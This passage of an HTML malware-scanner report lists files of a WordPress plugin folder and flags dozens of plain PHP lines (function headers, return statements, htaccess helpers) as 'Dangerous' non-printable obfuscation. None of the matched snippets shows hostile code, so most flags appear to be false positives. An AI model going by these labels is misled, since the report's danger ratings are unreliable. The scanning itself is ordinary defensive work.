</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 60</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that is used to register the actions </span><span style="color: #007700">and </span><span style="color: #0000BB">hooks into a single</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 68</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">type The collection of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters registered with WordPress</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 70</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add</span><span style="color: #007700">( </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">, </span><span style="color: #0000BB">$hook</span><span style="color: #007700">, </span><span style="color: #0000BB">$component</span><span style="color: #007700">, </span><span style="color: #0000BB">$callback</span><span style="color: #007700">, </span><span style="color: #0000BB">$priority</span><span style="color: #007700">, </span><span style="color: #0000BB">$accepted_args </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 80</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$hooks</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 87</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 9</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to execute the </span><span style="color: #007700">list </span><span style="color: #0000BB">of actions </span><span style="color: #007700">and </span><span style="color: #0000BB">filters</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_380").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/includes/class-protect-uploads-deactivator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 313.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_381" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$plugin </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Admin</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_index</span><span style="color: #007700">(); </span><span style="color: #0000BB">$plugin</span><span style="color: #007700">-></span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">(); </span><span style="color: #0000BB">delete_option</span><span style="color: #007700">( </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">().</span><span style="color: #DD0000">'-protection' </span><span style="color: #007700">); } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_381").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/includes/class-protect-uploads-activator.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 112.00 B</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 2</span><br><table id="file_382" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 5</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_382").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/includes/class-protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.75 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 12</span><br><table id="file_383" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">() { </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">-></span><span style="color: #0000BB">run</span><span style="color: #007700">(); } public function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">; } public function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">() { return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 19</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">load_dependencies</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 32</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_locale</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">define_admin_hooks</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 54</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">run</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 59</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 61</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 64</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_loader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 66</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">loader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 69</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_version</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 71</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">version</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_383").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/protect-uploads.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 1.51 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 3</span><br><table id="file_384" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() { require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'admin/class-protect-uploads-admin.php'</span><span style="color: #007700">; require_once </span><span style="color: #0000BB">plugin_dir_path</span><span style="color: #007700">( </span><span style="color: #0000BB">__FILE__ </span><span style="color: #007700">) . </span><span style="color: #DD0000">'includes/class-protect-uploads-deactivator.php'</span><span style="color: #007700">; </span><span style="color: #0000BB">$deactivation </span><span style="color: #007700">= new </span><span style="color: #0000BB">Alti_ProtectUploads_Deact</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 20</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">activate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">deactivate_alti_protect_uploads</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_384").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/yzktv/admin/class-protect-uploads-admin.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 9.85 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 15:43:03</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 40</span><br><table id="file_385" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_messages</span><span style="color: #007700">() { foreach (</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$name </span><span style="color: #007700">=> </span><span style="color: #0000BB">$messages</span><span style="color: #007700">) { foreach (</span><span style="color: #0000BB">$messages </span><span style="color: #007700">as </span><span style="color: #0000BB">$message</span><span style="color: #007700">) { return </span><span style="color: #DD0000">'<div id="message" class="' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'type'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'"><p>' </span><span style="color: #007700">. </span><span style="color: #0000BB">$message</span><span style="color: #007700">[</span><span style="color: #DD0000">'message'</span><span style="color: #007700">] . </span><span style="color: #DD0000">'</p></div>'</span><span style="color: #007700">; } } } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 10</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">__construct</span><span style="color: #007700">(</span><span style="color: #0000BB">$plugin_name</span><span style="color: #007700">, </span><span style="color: #0000BB">$version</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 120</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">create_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 150</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_index</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 164</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">remove_htaccess</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 16</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_plugin_name</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 183</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_protective_files_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">plugin_name</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 192</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$response</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 195</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file</span><span style="color: #007700">(</span><span style="color: #0000BB">$file</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">true</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 204</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_root_response_code</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 215</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_htaccess_content</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 217</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">file_get_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">get_uploads_dir</span><span style="color: #007700">() . </span><span style="color: #DD0000">'/.htaccess'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 21</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_submenu_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_htaccess_is_self_generated</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_uploads_is_protected</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_protective_file_removable</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 266</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_uploads_protection_message_array</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">render_settings_page</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 271</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns 403 code</span><span style="color: #007700">.</span><span style="color: #DD0000">', $this->plugin_name);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 289</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">check_apache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 292</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
